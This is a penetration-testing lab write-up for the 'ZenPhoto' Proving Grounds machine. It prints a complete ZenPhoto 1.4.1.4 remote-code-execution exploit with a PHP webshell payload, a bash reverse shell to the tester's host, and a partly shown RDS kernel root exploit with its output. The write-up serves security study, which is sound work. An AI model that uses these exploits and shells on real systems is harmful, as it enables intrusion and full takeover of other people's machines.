ZenPhoto

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.206.41
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-08 12:46 EST
Nmap scan report for 192.168.206.41
Host is up, received reset ttl 61 (0.12s latency).
Scanned at 2025-11-08 12:46:29 EST for 68s
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAIM3Qmxj/JapoH/Vg/pl8IAj0PTqw5Fj5rnhI+9Q0XT5tej5pHpUZoWTmbQKIwA7QBoTWtk4Hnonhkv5We43VXz0abBEvy3allgjf13cvxc96KX0bE7Bb8PhVCQJJBDTIz44koJhvFuSO/
sauL9j+lzaUltVMR6/bZbigTINrV4nAAAAFQCvlVi2Us40FGWv8TILJYOR/LJvcwAAAIAHpp8VGuPUA5BowTa55myGr/lGs0xTFXbxFm0We4/D5v3L9kUVgv6MIVL4jweRmXFYvei7YZDGikoe6OjF9PFtSkKriEaGqav6hOER3t
mtWChQfMlaNwiZfNJzKHBc4EqeCX4jpLLUxCZAEjwoE0koQRoFcbr+gywBNOQgtrfv+QAAAIA8v2C1COdjtNl4Bp3+XVLOkbYPIpedQXCgTLgRloa5wQZCaZimgE3+txqTQSb7Vp0B+LfjKdqcMFia8g9i+0YC+b69NimiFaZXU8
euBoh/GXNo8K2vFHF3yznq6KNPG4+EW3WfaLGqJWkBJM2bb1nJ0YaJZhpOInv2Gsanh4CHOA==
|   2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA7aKskCBM7hdQEibRza0Y1BAiJ0prjECzVow5/txHOHb+Ynokd1ByaBw5roKsOExD3h7d7VGjNVKNqSwB+SBHSRivJaEgCtiV3F/5Q1qdBpehE4zyv7whG9GKeALeNk05icqXCk
9kveUsreZyqEqN+c9p3Ed29jTD+6Alc7mml/Zev0EQs7hFfX/kYiV6V4KnQuQ7HXe3kzbMA9WB3yxtp0saBB5zlu4eWGsvyvCibP41ce81LtwkJDSXTr0LwBNYgZOD07GWW//BkOuJvHtKbWPqBievO0yubQxGbz0r7vID3a5DQM
j4ZTGrAQPCunaJkGlvZs2zftrUh/BMxQSFLw==
23/tcp   open  ipp     syn-ack ttl 61 CUPS 1.4
|_http-server-header: CUPS/1.4
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-title: 403 Forbidden
80/tcp   open  http    syn-ack ttl 61 Apache httpd 2.2.14 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.14 (Ubuntu)
3306/tcp open  mysql   syn-ack ttl 61 MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

<snipped>

SSH (20):

We can not access it because we do not have valid credentials.

? (23):

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ telnet 192.168.206.41 23
Trying 192.168.206.41...
Connected to 192.168.206.41.
Escape character is '^]'.
asdf
Connection closed by foreign host.

Nothing.

MySQL (3306):

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ mysql -h 192.168.206.41 
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.45.174' is not allowed to connect to this MySQL server

We can not access it from an external IP address.

HTTP (80):

Also nothing, lets run gobuster to try to identify any hidden directories:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]                             
└─$ gobuster dir -u http://192.168.206.41 -w /usr/share/wordlists/dirb/common.txt            
===============================================================                       
Gobuster v3.8                            
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)                         
===============================================================
[+] Url:                     http://192.168.206.41
[+] Method:                  GET                                                      
[+] Threads:                 10                                                       
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404                                                      
[+] User Agent:              gobuster/3.8                                             
[+] Timeout:                 10s                                                      
===============================================================
Starting gobuster in directory enumeration mode
===============================================================                  
/.htpasswd            (Status: 403) [Size: 291]                                       
/.hta                 (Status: 403) [Size: 286]                
/.htaccess            (Status: 403) [Size: 291]                                       
/cgi-bin/             (Status: 403) [Size: 290]                
/index                (Status: 200) [Size: 75]                                        
/index.html           (Status: 200) [Size: 75]                                   
/server-status        (Status: 403) [Size: 295]                                  
/test                 (Status: 301) [Size: 315] [--> http://192.168.206.41/test/]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished                                                                              
===============================================================

We have a hidden directory named test:

Here we can see it is powered by zenphoto.

Lets view the source code:

We will get the version of the running application.

Search for any public exploit:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]                                                                                                                   
└─$ searchsploit zenphoto 1.4.1.4                                                                                                                                           
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path                           
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution                                                                         | php/webapps/18083.php
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]                                                                                                                   
└─$ searchsploit zenphoto 1.4.1                                                                                                                                             
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution                                                                         | php/webapps/18083.php
ZenPhoto 1.4.10 - Local File Inclusion                                                                                                    | php/webapps/38841.txt
ZenPhoto 1.4.11 - Remote File Inclusion                                                                                                   | php/webapps/39571.txt
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Copy the one with RCE:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ searchsploit -m php/webapps/18083.php
  Exploit: ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/18083
     Path: /usr/share/exploitdb/exploits/php/webapps/18083.php
    Codes: OSVDB-76928, CVE-2011-4825
 Verified: True
File Type: PHP script, ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/ZenPhoto/18083.php

Read that script:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ cat 18083.php 
<?php

<snipped>

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die( "\n[-] No response from {$host}:80\n");

    fwrite($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+-----------------------------------------------------------+";
print "\n| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |";
print "\n+-----------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /zenphoto/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

$payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet  = "POST {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

http_send($host, $packet);

$packet  = "GET {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
    print "\nzenphoto-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
    print $m[1] : die("\n[-] Exploit failed!\n");
}

?>

Exploitation:

Lets run that script and pass the IP and the web root endpoint of the target:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ php 18083.php 

+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+

Usage......: php 18083.php <host> <path>

Example....: php 18083.php localhost /
Example....: php 18083.php localhost /zenphoto/

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ php 18083.php 192.168.206.41 /test/

+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+

zenphoto-shell# whoami
www-data

We confirmed we have remote command execution.

Lets get a reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ nc -nlvp 80
listening on [any] 80 ...

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ php 18083.php 192.168.206.41 /test/

+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+

zenphoto-shell# bash -c 'bash -i >& /dev/tcp/192.168.45.174/80 0>&1'

[-] Exploit failed!

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]                             
└─$ nc -nlvp 80                                                                                                                                                             
listening on [any] 80 ...                                                                                                                                                   
connect to [192.168.45.174] from (UNKNOWN) [192.168.206.41] 35026                     
bash: no job control in this shell                                                                                                                                          
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ python -c 'import pty;pty.spawn("/bin/bash")'
<ins/ajaxfilemanager/inc$ python -c 'import pty;pty.spawn("/bin/bash")'                                                                                                     
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ export TERM=xterm                                                                                                       
export TERM=xterm                                                                     
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ ^Z                                                                                           
zsh: suspended  nc -nlvp 80                                                                                                                                                 
                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]                             
└─$ stty -a                                                                           
speed 38400 baud; rows 43; columns 172; line = 0;                                     
<snipped>
                                                                                      
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]                                                                                                                   
└─$ stty raw -echo ; fg                                                               
[1]  + continued  nc -nlvp 80                                                         
                                                                                      
www-data@offsecsrv:/var/www/test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ stty rows 43 columns 172       
www-data@offsecsrv:/var/www/test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc$

Post-Exploitaion:

After doing some local enumeration, we will find that the version of the kernel of the operating system is old:

www-data@offsecsrv:/dev/shm$ uname -a                                                 
Linux offsecsrv 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux

www-data@offsecsrv:/dev/shm$ cat /etc/issue 
Ubuntu 10.04.3 LTS \n \l

If we searched online we will find that github repo:

GitHub - lucyoa/kernel-exploitsGitHub

We will find our version in one of the rds exploit versions:

Lets click on that rds blue word:

kernel-exploits/rds at master · lucyoa/kernel-exploitsGitHub

I will use one of the scripts:

www-data@offsecsrv:/dev/shm$ cat exploit.c                                                                                                                                  
#include <stdio.h>                                                                                                                                                          
#include <unistd.h>                                                                                                                                                         
#include <stdlib.h>                                                                   
#include <fcntl.h>                                                                                                                                                          
#include <sys/types.h>                                                                                                                                                      
#include <sys/socket.h>                                                                                                                                                     
#include <netinet/in.h>                                                                                                                                                     
#include <errno.h>                                                                    
#include <string.h>                                                                   
#include <sys/ptrace.h>                                                                                                                                                     
#include <sys/utsname.h>

<snipped>

        printf("[*] Got root!\n");                                                    
        execl("/bin/sh", "sh", NULL);                                                 
                                                                                                                                                                            
}

Compile it and execute it:

www-data@offsecsrv:/dev/shm$ gcc exploit.c -o exploit
www-data@offsecsrv:/dev/shm$ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
root

We are root.

Get the flags:

# cd /root
# ls -la
total 44
drwx------  5 root root 4096 Nov  8 12:45 . 
drwxr-xr-x 22 root root 4096 Aug  2  2024 ..
-rw-------  1 root root    0 Sep  8  2020 .bash_history
-rw-r--r--  1 root root 3106 Apr 23  2010 .bashrc
drwx------  2 root root 4096 Nov  9  2011 .cache
-rw-------  1 root root   42 Nov  9  2011 .lesshst
-rw-------  1 root root   27 Nov  9  2011 .mysql_history
-rw-r--r--  1 root root  140 Apr 23  2010 .profile
drwxr-xr-x  2 root root 4096 Nov  9  2011 .ssh
drwxr-xr-x  2 root root 4096 Jul 19  2011 .wapi
-r--------  1 root root    5 Nov  9  2011 mysqlpass
-r--------  1 root root   33 Nov  8 17:46 proof.txt
# cat proof.txt
b336e3feac22b637e39527b05a7ce36d
# cat /home/local.txt
af91f62b7736a472c1eed2899ef7b7ff

PreviousHetemit NextClue

Last updated 2 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagSSH (20):

hashtag? (23):

hashtagMySQL (3306):

hashtagHTTP (80):

hashtagExploitation:

hashtagPost-Exploitaion: